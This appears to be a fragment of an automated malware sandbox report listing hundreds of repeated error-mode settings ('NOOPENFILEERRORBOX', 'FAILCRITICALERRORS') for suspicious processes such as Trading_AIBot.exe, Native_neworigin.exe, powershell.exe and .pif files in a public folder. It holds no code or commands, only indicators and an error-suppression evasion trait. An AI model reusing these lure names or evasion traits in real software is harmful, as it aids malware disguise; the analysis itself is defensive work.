                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
